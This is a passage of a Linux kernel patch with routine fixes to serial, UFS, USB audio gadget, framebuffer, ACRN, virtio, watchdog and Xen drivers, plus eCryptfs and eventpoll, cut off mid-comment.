+@@ -740,8 +759,8 @@ static void set_clock_mux(struct uart_port *up, struct brcmuart_priv *priv,
+ 		dev_err(up->dev, "Error, baud: %d has %u.%u%% error\n",
+ 			baud, percent / 100, percent % 100);
+ 
+-	real_baud = rate / 16 / best_quot;
+-	dev_dbg(up->dev, "Selecting BAUD MUX rate: %u\n", rate);
++	real_baud = best_freq / 16 / best_quot;
++	dev_dbg(up->dev, "Selecting BAUD MUX rate: %u\n", best_freq);
+ 	dev_dbg(up->dev, "Requested baud: %u, Actual baud: %u\n",
+ 		baud, real_baud);
+ 
+@@ -750,7 +769,7 @@ static void set_clock_mux(struct uart_port *up, struct brcmuart_priv *priv,
+ 	i += (i / 2);
+ 	priv->char_wait = ns_to_ktime(i);
+ 
+-	up->uartclk = rate;
++	up->uartclk = best_freq;
+ }
+ 
+ static void brcmstb_set_termios(struct uart_port *up,
+diff --git a/drivers/tty/serial/8250/8250_mtk.c b/drivers/tty/serial/8250/8250_mtk.c
+index fb1d5ec0940e6..295b9ba1b4f3e 100644
+--- a/drivers/tty/serial/8250/8250_mtk.c
++++ b/drivers/tty/serial/8250/8250_mtk.c
+@@ -209,15 +209,19 @@ static int mtk8250_startup(struct uart_port *port)
+ 
+ static void mtk8250_shutdown(struct uart_port *port)
+ {
+-#ifdef CONFIG_SERIAL_8250_DMA
+ 	struct uart_8250_port *up = up_to_u8250p(port);
+ 	struct mtk8250_data *data = port->private_data;
++	int irq = data->rx_wakeup_irq;
+ 
++#ifdef CONFIG_SERIAL_8250_DMA
+ 	if (up->dma)
+ 		data->rx_status = DMA_RX_SHUTDOWN;
+ #endif
+ 
+-	return serial8250_do_shutdown(port);
++	serial8250_do_shutdown(port);
++
++	if (irq >= 0)
++		serial8250_do_set_mctrl(&up->port, TIOCM_RTS);
+ }
+ 
+ static void mtk8250_disable_intrs(struct uart_8250_port *up, int mask)
+diff --git a/drivers/tty/serial/max3100.c b/drivers/tty/serial/max3100.c
+index c69602f356fdc..5d8660fed081e 100644
+--- a/drivers/tty/serial/max3100.c
++++ b/drivers/tty/serial/max3100.c
+@@ -45,6 +45,9 @@
+ #include <linux/freezer.h>
+ #include <linux/tty.h>
+ #include <linux/tty_flip.h>
++#include <linux/types.h>
++
++#include <asm/unaligned.h>
+ 
+ #include <linux/serial_max3100.h>
+ 
+@@ -191,7 +194,7 @@ static void max3100_timeout(struct timer_list *t)
+ static int max3100_sr(struct max3100_port *s, u16 tx, u16 *rx)
+ {
+ 	struct spi_message message;
+-	u16 etx, erx;
++	__be16 etx, erx;
+ 	int status;
+ 	struct spi_transfer tran = {
+ 		.tx_buf = &etx,
+@@ -213,7 +216,7 @@ static int max3100_sr(struct max3100_port *s, u16 tx, u16 *rx)
+ 	return 0;
+ }
+ 
+-static int max3100_handlerx(struct max3100_port *s, u16 rx)
++static int max3100_handlerx_unlocked(struct max3100_port *s, u16 rx)
+ {
+ 	unsigned int ch, flg, status = 0;
+ 	int ret = 0, cts;
+@@ -253,6 +256,17 @@ static int max3100_handlerx(struct max3100_port *s, u16 rx)
+ 	return ret;
+ }
+ 
++static int max3100_handlerx(struct max3100_port *s, u16 rx)
++{
++	unsigned long flags;
++	int ret;
++
++	uart_port_lock_irqsave(&s->port, &flags);
++	ret = max3100_handlerx_unlocked(s, rx);
++	uart_port_unlock_irqrestore(&s->port, flags);
++	return ret;
++}
++
+ static void max3100_work(struct work_struct *w)
+ {
+ 	struct max3100_port *s = container_of(w, struct max3100_port, work);
+@@ -739,13 +753,14 @@ static int max3100_probe(struct spi_device *spi)
+ 	mutex_lock(&max3100s_lock);
+ 
+ 	if (!uart_driver_registered) {
+-		uart_driver_registered = 1;
+ 		retval = uart_register_driver(&max3100_uart_driver);
+ 		if (retval) {
+ 			printk(KERN_ERR "Couldn't register max3100 uart driver\n");
+ 			mutex_unlock(&max3100s_lock);
+ 			return retval;
+ 		}
++
++		uart_driver_registered = 1;
+ 	}
+ 
+ 	for (i = 0; i < MAX_MAX3100; i++)
+@@ -831,6 +846,7 @@ static void max3100_remove(struct spi_device *spi)
+ 		}
+ 	pr_debug("removing max3100 driver\n");
+ 	uart_unregister_driver(&max3100_uart_driver);
++	uart_driver_registered = 0;
+ 
+ 	mutex_unlock(&max3100s_lock);
+ }
+diff --git a/drivers/tty/serial/sc16is7xx.c b/drivers/tty/serial/sc16is7xx.c
+index e331b57d6d7d3..e6eedebf67765 100644
+--- a/drivers/tty/serial/sc16is7xx.c
++++ b/drivers/tty/serial/sc16is7xx.c
+@@ -18,6 +18,7 @@
+ #include <linux/module.h>
+ #include <linux/property.h>
+ #include <linux/regmap.h>
++#include <linux/sched.h>
+ #include <linux/serial_core.h>
+ #include <linux/serial.h>
+ #include <linux/tty.h>
+@@ -25,7 +26,6 @@
+ #include <linux/spi/spi.h>
+ #include <linux/uaccess.h>
+ #include <linux/units.h>
+-#include <uapi/linux/sched/types.h>
+ 
+ #define SC16IS7XX_NAME			"sc16is7xx"
+ #define SC16IS7XX_MAX_DEVS		8
+diff --git a/drivers/tty/serial/sh-sci.c b/drivers/tty/serial/sh-sci.c
+index e67d3a886bf4f..08ad5ae411216 100644
+--- a/drivers/tty/serial/sh-sci.c
++++ b/drivers/tty/serial/sh-sci.c
+@@ -1244,9 +1244,14 @@ static void sci_dma_rx_chan_invalidate(struct sci_port *s)
+ static void sci_dma_rx_release(struct sci_port *s)
+ {
+ 	struct dma_chan *chan = s->chan_rx_saved;
++	struct uart_port *port = &s->port;
++	unsigned long flags;
+ 
++	uart_port_lock_irqsave(port, &flags);
+ 	s->chan_rx_saved = NULL;
+ 	sci_dma_rx_chan_invalidate(s);
++	uart_port_unlock_irqrestore(port, flags);
++
+ 	dmaengine_terminate_sync(chan);
+ 	dma_free_coherent(chan->device->dev, s->buf_len_rx * 2, s->rx_buf[0],
+ 			  sg_dma_address(&s->sg_rx[0]));
+diff --git a/drivers/ufs/core/ufshcd.c b/drivers/ufs/core/ufshcd.c
+index 948449a13247c..5922cb5a1de0d 100644
+--- a/drivers/ufs/core/ufshcd.c
++++ b/drivers/ufs/core/ufshcd.c
+@@ -4074,7 +4074,7 @@ static int ufshcd_uic_pwr_ctrl(struct ufs_hba *hba, struct uic_command *cmd)
+ 		 * Make sure UIC command completion interrupt is disabled before
+ 		 * issuing UIC command.
+ 		 */
+-		wmb();
++		ufshcd_readl(hba, REG_INTERRUPT_ENABLE);
+ 		reenable_intr = true;
+ 	}
+ 	spin_unlock_irqrestore(hba->host->host_lock, flags);
+@@ -9817,7 +9817,7 @@ int ufshcd_init(struct ufs_hba *hba, void __iomem *mmio_base, unsigned int irq)
+ 	 * Make sure that UFS interrupts are disabled and any pending interrupt
+ 	 * status is cleared before registering UFS interrupt handler.
+ 	 */
+-	mb();
++	ufshcd_readl(hba, REG_INTERRUPT_ENABLE);
+ 
+ 	/* IRQ registration */
+ 	err = devm_request_irq(dev, irq, ufshcd_intr, IRQF_SHARED, UFSHCD, hba);
+diff --git a/drivers/ufs/host/cdns-pltfrm.c b/drivers/ufs/host/cdns-pltfrm.c
+index e05c0ae64eea4..38a238eaa2133 100644
+--- a/drivers/ufs/host/cdns-pltfrm.c
++++ b/drivers/ufs/host/cdns-pltfrm.c
+@@ -137,7 +137,7 @@ static int cdns_ufs_set_hclkdiv(struct ufs_hba *hba)
+ 	 * Make sure the register was updated,
+ 	 * UniPro layer will not work with an incorrect value.
+ 	 */
+-	mb();
++	ufshcd_readl(hba, CDNS_UFS_REG_HCLKDIV);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/ufs/host/ufs-qcom.c b/drivers/ufs/host/ufs-qcom.c
+index 8ad1415e10b63..ecd5939f4c9a6 100644
+--- a/drivers/ufs/host/ufs-qcom.c
++++ b/drivers/ufs/host/ufs-qcom.c
+@@ -226,8 +226,9 @@ static void ufs_qcom_select_unipro_mode(struct ufs_qcom_host *host)
+ 	ufshcd_rmwl(host->hba, QUNIPRO_SEL,
+ 		   ufs_qcom_cap_qunipro(host) ? QUNIPRO_SEL : 0,
+ 		   REG_UFS_CFG1);
+-	/* make sure above configuration is applied before we return */
+-	mb();
++
++	if (host->hw_ver.major >= 0x05)
++		ufshcd_rmwl(host->hba, QUNIPRO_G4_SEL, 0, REG_UFS_CFG0);
+ }
+ 
+ /*
+@@ -335,7 +336,7 @@ static void ufs_qcom_enable_hw_clk_gating(struct ufs_hba *hba)
+ 		REG_UFS_CFG2);
+ 
+ 	/* Ensure that HW clock gating is enabled before next operations */
+-	mb();
++	ufshcd_readl(hba, REG_UFS_CFG2);
+ }
+ 
+ static int ufs_qcom_hce_enable_notify(struct ufs_hba *hba,
+@@ -432,7 +433,7 @@ static int ufs_qcom_cfg_timers(struct ufs_hba *hba, u32 gear,
+ 		 * make sure above write gets applied before we return from
+ 		 * this function.
+ 		 */
+-		mb();
++		ufshcd_readl(hba, REG_UFS_SYS1CLK_1US);
+ 	}
+ 
+ 	if (ufs_qcom_cap_qunipro(host))
+@@ -498,9 +499,9 @@ static int ufs_qcom_cfg_timers(struct ufs_hba *hba, u32 gear,
+ 		mb();
+ 	}
+ 
+-	if (update_link_startup_timer) {
++	if (update_link_startup_timer && host->hw_ver.major != 0x5) {
+ 		ufshcd_writel(hba, ((core_clk_rate / MSEC_PER_SEC) * 100),
+-			      REG_UFS_PA_LINK_STARTUP_TIMER);
++			      REG_UFS_CFG0);
+ 		/*
+ 		 * make sure that this configuration is applied before
+ 		 * we return
+diff --git a/drivers/ufs/host/ufs-qcom.h b/drivers/ufs/host/ufs-qcom.h
+index 44466a395bb53..24367cee0b3ff 100644
+--- a/drivers/ufs/host/ufs-qcom.h
++++ b/drivers/ufs/host/ufs-qcom.h
+@@ -36,8 +36,10 @@ enum {
+ 	REG_UFS_TX_SYMBOL_CLK_NS_US         = 0xC4,
+ 	REG_UFS_LOCAL_PORT_ID_REG           = 0xC8,
+ 	REG_UFS_PA_ERR_CODE                 = 0xCC,
+-	REG_UFS_RETRY_TIMER_REG             = 0xD0,
+-	REG_UFS_PA_LINK_STARTUP_TIMER       = 0xD8,
++	/* On older UFS revisions, this register is called "RETRY_TIMER_REG" */
++	REG_UFS_PARAM0                      = 0xD0,
++	/* On older UFS revisions, this register is called "REG_UFS_PA_LINK_STARTUP_TIMER" */
++	REG_UFS_CFG0                        = 0xD8,
+ 	REG_UFS_CFG1                        = 0xDC,
+ 	REG_UFS_CFG2                        = 0xE0,
+ 	REG_UFS_HW_VERSION                  = 0xE4,
+@@ -75,6 +77,9 @@ enum {
+ #define UFS_CNTLR_2_x_x_VEN_REGS_OFFSET(x)	(0x000 + x)
+ #define UFS_CNTLR_3_x_x_VEN_REGS_OFFSET(x)	(0x400 + x)
+ 
++/* bit definitions for REG_UFS_CFG0 register */
++#define QUNIPRO_G4_SEL		BIT(5)
++
+ /* bit definitions for REG_UFS_CFG1 register */
+ #define QUNIPRO_SEL		0x1
+ #define UTP_DBG_RAMS_EN		0x20000
+@@ -146,10 +151,10 @@ static inline void ufs_qcom_assert_reset(struct ufs_hba *hba)
+ 			1 << OFFSET_UFS_PHY_SOFT_RESET, REG_UFS_CFG1);
+ 
+ 	/*
+-	 * Make sure assertion of ufs phy reset is written to
+-	 * register before returning
++	 * Dummy read to ensure the write takes effect before doing any sort
++	 * of delay
+ 	 */
+-	mb();
++	ufshcd_readl(hba, REG_UFS_CFG1);
+ }
+ 
+ static inline void ufs_qcom_deassert_reset(struct ufs_hba *hba)
+@@ -158,10 +163,10 @@ static inline void ufs_qcom_deassert_reset(struct ufs_hba *hba)
+ 			0 << OFFSET_UFS_PHY_SOFT_RESET, REG_UFS_CFG1);
+ 
+ 	/*
+-	 * Make sure de-assertion of ufs phy reset is written to
+-	 * register before returning
++	 * Dummy read to ensure the write takes effect before doing any sort
++	 * of delay
+ 	 */
+-	mb();
++	ufshcd_readl(hba, REG_UFS_CFG1);
+ }
+ 
+ /* Host controller hardware version: major.minor.step */
+diff --git a/drivers/usb/gadget/function/u_audio.c b/drivers/usb/gadget/function/u_audio.c
+index 4a42574b4a7fe..ec1dceb087293 100644
+--- a/drivers/usb/gadget/function/u_audio.c
++++ b/drivers/usb/gadget/function/u_audio.c
+@@ -57,13 +57,13 @@ struct uac_rtd_params {
+ 
+   /* Volume/Mute controls and their state */
+   int fu_id; /* Feature Unit ID */
+-  struct snd_kcontrol *snd_kctl_volume;
+-  struct snd_kcontrol *snd_kctl_mute;
++  struct snd_ctl_elem_id snd_kctl_volume_id;
++  struct snd_ctl_elem_id snd_kctl_mute_id;
+   s16 volume_min, volume_max, volume_res;
+   s16 volume;
+   int mute;
+ 
+-	struct snd_kcontrol *snd_kctl_rate; /* read-only current rate */
++	struct snd_ctl_elem_id snd_kctl_rate_id; /* read-only current rate */
+ 	int srate; /* selected samplerate */
+ 	int active; /* playback/capture running */
+ 
+@@ -494,14 +494,13 @@ static inline void free_ep_fback(struct uac_rtd_params *prm, struct usb_ep *ep)
+ static void set_active(struct uac_rtd_params *prm, bool active)
+ {
+ 	// notifying through the Rate ctrl
+-	struct snd_kcontrol *kctl = prm->snd_kctl_rate;
+ 	unsigned long flags;
+ 
+ 	spin_lock_irqsave(&prm->lock, flags);
+ 	if (prm->active != active) {
+ 		prm->active = active;
+ 		snd_ctl_notify(prm->uac->card, SNDRV_CTL_EVENT_MASK_VALUE,
+-				&kctl->id);
++				&prm->snd_kctl_rate_id);
+ 	}
+ 	spin_unlock_irqrestore(&prm->lock, flags);
+ }
+@@ -807,7 +806,7 @@ int u_audio_set_volume(struct g_audio *audio_dev, int playback, s16 val)
+ 
+ 	if (change)
+ 		snd_ctl_notify(uac->card, SNDRV_CTL_EVENT_MASK_VALUE,
+-				&prm->snd_kctl_volume->id);
++				&prm->snd_kctl_volume_id);
+ 
+ 	return 0;
+ }
+@@ -856,7 +855,7 @@ int u_audio_set_mute(struct g_audio *audio_dev, int playback, int val)
+ 
+ 	if (change)
+ 		snd_ctl_notify(uac->card, SNDRV_CTL_EVENT_MASK_VALUE,
+-			       &prm->snd_kctl_mute->id);
++			       &prm->snd_kctl_mute_id);
+ 
+ 	return 0;
+ }
+@@ -1331,7 +1330,7 @@ int g_audio_setup(struct g_audio *g_audio, const char *pcm_name,
+ 			err = snd_ctl_add(card, kctl);
+ 			if (err < 0)
+ 				goto snd_fail;
+-			prm->snd_kctl_mute = kctl;
++			prm->snd_kctl_mute_id = kctl->id;
+ 			prm->mute = 0;
+ 		}
+ 
+@@ -1359,7 +1358,7 @@ int g_audio_setup(struct g_audio *g_audio, const char *pcm_name,
+ 			err = snd_ctl_add(card, kctl);
+ 			if (err < 0)
+ 				goto snd_fail;
+-			prm->snd_kctl_volume = kctl;
++			prm->snd_kctl_volume_id = kctl->id;
+ 			prm->volume = fu->volume_max;
+ 			prm->volume_max = fu->volume_max;
+ 			prm->volume_min = fu->volume_min;
+@@ -1383,7 +1382,7 @@ int g_audio_setup(struct g_audio *g_audio, const char *pcm_name,
+ 		err = snd_ctl_add(card, kctl);
+ 		if (err < 0)
+ 			goto snd_fail;
+-		prm->snd_kctl_rate = kctl;
++		prm->snd_kctl_rate_id = kctl->id;
+ 	}
+ 
+ 	strscpy(card->driver, card_name, sizeof(card->driver));
+@@ -1420,6 +1419,8 @@ void g_audio_cleanup(struct g_audio *g_audio)
+ 		return;
+ 
+ 	uac = g_audio->uac;
++	g_audio->uac = NULL;
++
+ 	card = uac->card;
+ 	if (card)
+ 		snd_card_free_when_closed(card);
+diff --git a/drivers/video/fbdev/Kconfig b/drivers/video/fbdev/Kconfig
+index ff95f19224901..37089d5a7ccc5 100644
+--- a/drivers/video/fbdev/Kconfig
++++ b/drivers/video/fbdev/Kconfig
+@@ -2014,8 +2014,8 @@ config FB_COBALT
+ 	depends on FB && MIPS_COBALT
+ 
+ config FB_SH7760
+-	bool "SH7760/SH7763/SH7720/SH7721 LCDC support"
+-	depends on FB=y && (CPU_SUBTYPE_SH7760 || CPU_SUBTYPE_SH7763 \
++	tristate "SH7760/SH7763/SH7720/SH7721 LCDC support"
++	depends on FB && (CPU_SUBTYPE_SH7760 || CPU_SUBTYPE_SH7763 \
+ 		|| CPU_SUBTYPE_SH7720 || CPU_SUBTYPE_SH7721)
+ 	select FB_CFB_FILLRECT
+ 	select FB_CFB_COPYAREA
+diff --git a/drivers/video/fbdev/sh_mobile_lcdcfb.c b/drivers/video/fbdev/sh_mobile_lcdcfb.c
+index 6d00893d41f4c..444c3ca9d4d4d 100644
+--- a/drivers/video/fbdev/sh_mobile_lcdcfb.c
++++ b/drivers/video/fbdev/sh_mobile_lcdcfb.c
+@@ -1576,7 +1576,7 @@ sh_mobile_lcdc_overlay_fb_init(struct sh_mobile_lcdc_overlay *ovl)
+ 	 */
+ 	info->fix = sh_mobile_lcdc_overlay_fix;
+ 	snprintf(info->fix.id, sizeof(info->fix.id),
+-		 "SH Mobile LCDC Overlay %u", ovl->index);
++		 "SHMobile ovl %u", ovl->index);
+ 	info->fix.smem_start = ovl->dma_handle;
+ 	info->fix.smem_len = ovl->fb_size;
+ 	info->fix.line_length = ovl->pitch;
+diff --git a/drivers/video/fbdev/sis/init301.c b/drivers/video/fbdev/sis/init301.c
+index a8fb41f1a2580..09329072004f4 100644
+--- a/drivers/video/fbdev/sis/init301.c
++++ b/drivers/video/fbdev/sis/init301.c
+@@ -172,7 +172,7 @@ static const unsigned char SiS_HiTVGroup3_2[] = {
+ };
+ 
+ /* 301C / 302ELV extended Part2 TV registers (4 tap scaler) */
+-
++#ifdef CONFIG_FB_SIS_315
+ static const unsigned char SiS_Part2CLVX_1[] = {
+     0x00,0x00,
+     0x00,0x20,0x00,0x00,0x7F,0x20,0x02,0x7F,0x7D,0x20,0x04,0x7F,0x7D,0x1F,0x06,0x7E,
+@@ -245,7 +245,6 @@ static const unsigned char SiS_Part2CLVX_6[] = {   /* 1080i */
+     0xFF,0xFF,
+ };
+ 
+-#ifdef CONFIG_FB_SIS_315
+ /* 661 et al LCD data structure (2.03.00) */
+ static const unsigned char SiS_LCDStruct661[] = {
+     /* 1024x768 */
+diff --git a/drivers/virt/acrn/mm.c b/drivers/virt/acrn/mm.c
+index b4ad8d452e9a1..8ef49d7be453c 100644
+--- a/drivers/virt/acrn/mm.c
++++ b/drivers/virt/acrn/mm.c
+@@ -155,43 +155,83 @@ int acrn_vm_memseg_unmap(struct acrn_vm *vm, struct acrn_vm_memmap *memmap)
+ int acrn_vm_ram_map(struct acrn_vm *vm, struct acrn_vm_memmap *memmap)
+ {
+ 	struct vm_memory_region_batch *regions_info;
+-	int nr_pages, i = 0, order, nr_regions = 0;
++	int nr_pages, i, order, nr_regions = 0;
+ 	struct vm_memory_mapping *region_mapping;
+ 	struct vm_memory_region_op *vm_region;
+ 	struct page **pages = NULL, *page;
+ 	void *remap_vaddr;
+ 	int ret, pinned;
+ 	u64 user_vm_pa;
+-	unsigned long pfn;
+ 	struct vm_area_struct *vma;
+ 
+ 	if (!vm || !memmap)
+ 		return -EINVAL;
+ 
++	/* Get the page number of the map region */
++	nr_pages = memmap->len >> PAGE_SHIFT;
++	if (!nr_pages)
++		return -EINVAL;
++
+ 	mmap_read_lock(current->mm);
+ 	vma = vma_lookup(current->mm, memmap->vma_base);
+ 	if (vma && ((vma->vm_flags & VM_PFNMAP) != 0)) {
++		unsigned long start_pfn, cur_pfn;
++		spinlock_t *ptl;
++		bool writable;
++		pte_t *ptep;
++
+ 		if ((memmap->vma_base + memmap->len) > vma->vm_end) {
+ 			mmap_read_unlock(current->mm);
+ 			return -EINVAL;
+ 		}
+ 
+-		ret = follow_pfn(vma, memmap->vma_base, &pfn);
++		for (i = 0; i < nr_pages; i++) {
++			ret = follow_pte(vma->vm_mm,
++					 memmap->vma_base + i * PAGE_SIZE,
++					 &ptep, &ptl);
++			if (ret)
++				break;
++
++			cur_pfn = pte_pfn(ptep_get(ptep));
++			if (i == 0)
++				start_pfn = cur_pfn;
++			writable = !!pte_write(ptep_get(ptep));
++			pte_unmap_unlock(ptep, ptl);
++
++			/* Disallow write access if the PTE is not writable. */
++			if (!writable &&
++			    (memmap->attr & ACRN_MEM_ACCESS_WRITE)) {
++				ret = -EFAULT;
++				break;
++			}
++
++			/* Disallow refcounted pages. */
++			if (pfn_valid(cur_pfn) &&
++			    !PageReserved(pfn_to_page(cur_pfn))) {
++				ret = -EFAULT;
++				break;
++			}
++
++			/* Disallow non-contiguous ranges. */
++			if (cur_pfn != start_pfn + i) {
++				ret = -EINVAL;
++				break;
++			}
++		}
+ 		mmap_read_unlock(current->mm);
+-		if (ret < 0) {
++
++		if (ret) {
+ 			dev_dbg(acrn_dev.this_device,
+ 				"Failed to lookup PFN at VMA:%pK.\n", (void *)memmap->vma_base);
+ 			return ret;
+ 		}
+ 
+ 		return acrn_mm_region_add(vm, memmap->user_vm_pa,
+-			 PFN_PHYS(pfn), memmap->len,
++			 PFN_PHYS(start_pfn), memmap->len,
+ 			 ACRN_MEM_TYPE_WB, memmap->attr);
+ 	}
+ 	mmap_read_unlock(current->mm);
+ 
+-	/* Get the page number of the map region */
+-	nr_pages = memmap->len >> PAGE_SHIFT;
+ 	pages = vzalloc(array_size(nr_pages, sizeof(*pages)));
+ 	if (!pages)
+ 		return -ENOMEM;
+@@ -235,12 +275,11 @@ int acrn_vm_ram_map(struct acrn_vm *vm, struct acrn_vm_memmap *memmap)
+ 	mutex_unlock(&vm->regions_mapping_lock);
+ 
+ 	/* Calculate count of vm_memory_region_op */
+-	while (i < nr_pages) {
++	for (i = 0; i < nr_pages; i += 1 << order) {
+ 		page = pages[i];
+ 		VM_BUG_ON_PAGE(PageTail(page), page);
+ 		order = compound_order(page);
+ 		nr_regions++;
+-		i += 1 << order;
+ 	}
+ 
+ 	/* Prepare the vm_memory_region_batch */
+@@ -257,8 +296,7 @@ int acrn_vm_ram_map(struct acrn_vm *vm, struct acrn_vm_memmap *memmap)
+ 	regions_info->regions_num = nr_regions;
+ 	regions_info->regions_gpa = virt_to_phys(vm_region);
+ 	user_vm_pa = memmap->user_vm_pa;
+-	i = 0;
+-	while (i < nr_pages) {
++	for (i = 0; i < nr_pages; i += 1 << order) {
+ 		u32 region_size;
+ 
+ 		page = pages[i];
+@@ -274,7 +312,6 @@ int acrn_vm_ram_map(struct acrn_vm *vm, struct acrn_vm_memmap *memmap)
+ 
+ 		vm_region++;
+ 		user_vm_pa += region_size;
+-		i += 1 << order;
+ 	}
+ 
+ 	/* Inform the ACRN Hypervisor to set up EPT mappings */
+diff --git a/drivers/virtio/virtio_pci_common.c b/drivers/virtio/virtio_pci_common.c
+index a6c86f916dbdf..6bfb67d4866c3 100644
+--- a/drivers/virtio/virtio_pci_common.c
++++ b/drivers/virtio/virtio_pci_common.c
+@@ -345,8 +345,10 @@ static int vp_find_vqs_msix(struct virtio_device *vdev, unsigned int nvqs,
+ 				  vring_interrupt, 0,
+ 				  vp_dev->msix_names[msix_vec],
+ 				  vqs[i]);
+-		if (err)
++		if (err) {
++			vp_del_vq(vqs[i]);
+ 			goto error_find;
++		}
+ 	}
+ 	return 0;
+ 
+diff --git a/drivers/watchdog/bd9576_wdt.c b/drivers/watchdog/bd9576_wdt.c
+index 4a20e07fbb699..f00ea1b4e40b6 100644
+--- a/drivers/watchdog/bd9576_wdt.c
++++ b/drivers/watchdog/bd9576_wdt.c
+@@ -29,7 +29,6 @@ struct bd9576_wdt_priv {
+ 	struct gpio_desc	*gpiod_en;
+ 	struct device		*dev;
+ 	struct regmap		*regmap;
+-	bool			always_running;
+ 	struct watchdog_device	wdd;
+ };
+ 
+@@ -62,10 +61,7 @@ static int bd9576_wdt_stop(struct watchdog_device *wdd)
+ {
+ 	struct bd9576_wdt_priv *priv = watchdog_get_drvdata(wdd);
+ 
+-	if (!priv->always_running)
+-		bd9576_wdt_disable(priv);
+-	else
+-		set_bit(WDOG_HW_RUNNING, &wdd->status);
++	bd9576_wdt_disable(priv);
+ 
+ 	return 0;
+ }
+@@ -264,9 +260,6 @@ static int bd9576_wdt_probe(struct platform_device *pdev)
+ 	if (ret)
+ 		return ret;
+ 
+-	priv->always_running = device_property_read_bool(dev->parent,
+-							 "always-running");
+-
+ 	watchdog_set_drvdata(&priv->wdd, priv);
+ 
+ 	priv->wdd.info			= &bd957x_wdt_ident;
+@@ -281,9 +274,6 @@ static int bd9576_wdt_probe(struct platform_device *pdev)
+ 
+ 	watchdog_stop_on_reboot(&priv->wdd);
+ 
+-	if (priv->always_running)
+-		bd9576_wdt_start(&priv->wdd);
+-
+ 	return devm_watchdog_register_device(dev, &priv->wdd);
+ }
+ 
+diff --git a/drivers/watchdog/sa1100_wdt.c b/drivers/watchdog/sa1100_wdt.c
+index 82ac5d19f519e..1745d7cafb762 100644
+--- a/drivers/watchdog/sa1100_wdt.c
++++ b/drivers/watchdog/sa1100_wdt.c
+@@ -191,9 +191,8 @@ static int sa1100dog_probe(struct platform_device *pdev)
+ 	if (!res)
+ 		return -ENXIO;
+ 	reg_base = devm_ioremap(&pdev->dev, res->start, resource_size(res));
+-	ret = PTR_ERR_OR_ZERO(reg_base);
+-	if (ret)
+-		return ret;
++	if (!reg_base)
++		return -ENOMEM;
+ 
+ 	clk = clk_get(NULL, "OSTIMER0");
+ 	if (IS_ERR(clk)) {
+diff --git a/drivers/xen/xenbus/xenbus_probe.c b/drivers/xen/xenbus/xenbus_probe.c
+index 3205e5d724c8c..1a9ded0cddcb0 100644
+--- a/drivers/xen/xenbus/xenbus_probe.c
++++ b/drivers/xen/xenbus/xenbus_probe.c
+@@ -65,13 +65,17 @@
+ #include "xenbus.h"
+ 
+ 
+-static int xs_init_irq;
++static int xs_init_irq = -1;
+ int xen_store_evtchn;
+ EXPORT_SYMBOL_GPL(xen_store_evtchn);
+ 
+ struct xenstore_domain_interface *xen_store_interface;
+ EXPORT_SYMBOL_GPL(xen_store_interface);
+ 
++#define XS_INTERFACE_READY \
++	((xen_store_interface != NULL) && \
++	 (xen_store_interface->connection == XENSTORE_CONNECTED))
++
+ enum xenstore_init xen_store_domain_type;
+ EXPORT_SYMBOL_GPL(xen_store_domain_type);
+ 
+@@ -751,19 +755,19 @@ static void xenbus_probe(void)
+ {
+ 	xenstored_ready = 1;
+ 
+-	if (!xen_store_interface) {
++	if (!xen_store_interface)
+ 		xen_store_interface = memremap(xen_store_gfn << XEN_PAGE_SHIFT,
+ 					       XEN_PAGE_SIZE, MEMREMAP_WB);
+-		/*
+-		 * Now it is safe to free the IRQ used for xenstore late
+-		 * initialization. No need to unbind: it is about to be
+-		 * bound again from xb_init_comms. Note that calling
+-		 * unbind_from_irqhandler now would result in xen_evtchn_close()
+-		 * being called and the event channel not being enabled again
+-		 * afterwards, resulting in missed event notifications.
+-		 */
++	/*
++	 * Now it is safe to free the IRQ used for xenstore late
++	 * initialization. No need to unbind: it is about to be
++	 * bound again from xb_init_comms. Note that calling
++	 * unbind_from_irqhandler now would result in xen_evtchn_close()
++	 * being called and the event channel not being enabled again
++	 * afterwards, resulting in missed event notifications.
++	 */
++	if (xs_init_irq >= 0)
+ 		free_irq(xs_init_irq, &xb_waitq);
+-	}
+ 
+ 	/*
+ 	 * In the HVM case, xenbus_init() deferred its call to
+@@ -822,7 +826,7 @@ static int __init xenbus_probe_initcall(void)
+ 	if (xen_store_domain_type == XS_PV ||
+ 	    (xen_store_domain_type == XS_HVM &&
+ 	     !xs_hvm_defer_init_for_callback() &&
+-	     xen_store_interface != NULL))
++	     XS_INTERFACE_READY))
+ 		xenbus_probe();
+ 
+ 	/*
+@@ -831,7 +835,7 @@ static int __init xenbus_probe_initcall(void)
+ 	 * started, then probe.  It will be triggered when communication
+ 	 * starts happening, by waiting on xb_waitq.
+ 	 */
+-	if (xen_store_domain_type == XS_LOCAL || xen_store_interface == NULL) {
++	if (xen_store_domain_type == XS_LOCAL || !XS_INTERFACE_READY) {
+ 		struct task_struct *probe_task;
+ 
+ 		probe_task = kthread_run(xenbus_probe_thread, NULL,
+@@ -1014,6 +1018,12 @@ static int __init xenbus_init(void)
+ 			xen_store_interface =
+ 				memremap(xen_store_gfn << XEN_PAGE_SHIFT,
+ 					 XEN_PAGE_SIZE, MEMREMAP_WB);
++			if (!xen_store_interface) {
++				pr_err("%s: cannot map HVM_PARAM_STORE_PFN=%llx\n",
++				       __func__, v);
++				err = -EINVAL;
++				goto out_error;
++			}
+ 			if (xen_store_interface->connection != XENSTORE_CONNECTED)
+ 				wait = true;
+ 		}
+diff --git a/fs/ecryptfs/keystore.c b/fs/ecryptfs/keystore.c
+index 3fe41964c0d8d..7f9f68c00ef63 100644
+--- a/fs/ecryptfs/keystore.c
++++ b/fs/ecryptfs/keystore.c
+@@ -300,9 +300,11 @@ write_tag_66_packet(char *signature, u8 cipher_code,
+ 	 *         | Key Identifier Size      | 1 or 2 bytes |
+ 	 *         | Key Identifier           | arbitrary    |
+ 	 *         | File Encryption Key Size | 1 or 2 bytes |
++	 *         | Cipher Code              | 1 byte       |
+ 	 *         | File Encryption Key      | arbitrary    |
++	 *         | Checksum                 | 2 bytes      |
+ 	 */
+-	data_len = (5 + ECRYPTFS_SIG_SIZE_HEX + crypt_stat->key_size);
++	data_len = (8 + ECRYPTFS_SIG_SIZE_HEX + crypt_stat->key_size);
+ 	*packet = kmalloc(data_len, GFP_KERNEL);
+ 	message = *packet;
+ 	if (!message) {
+diff --git a/fs/eventpoll.c b/fs/eventpoll.c
+index eccecd3fac90c..7221072f39fad 100644
+--- a/fs/eventpoll.c
++++ b/fs/eventpoll.c
+@@ -839,6 +839,34 @@ static __poll_t __ep_eventpoll_poll(struct file *file, poll_table *wait, int dep
+ 	return res;
+ }
+ 
++/*
++ * The ffd.file pointer may be in the process of being torn down due to
++ * being closed, but we may not have finished eventpoll_release() yet.
++ *
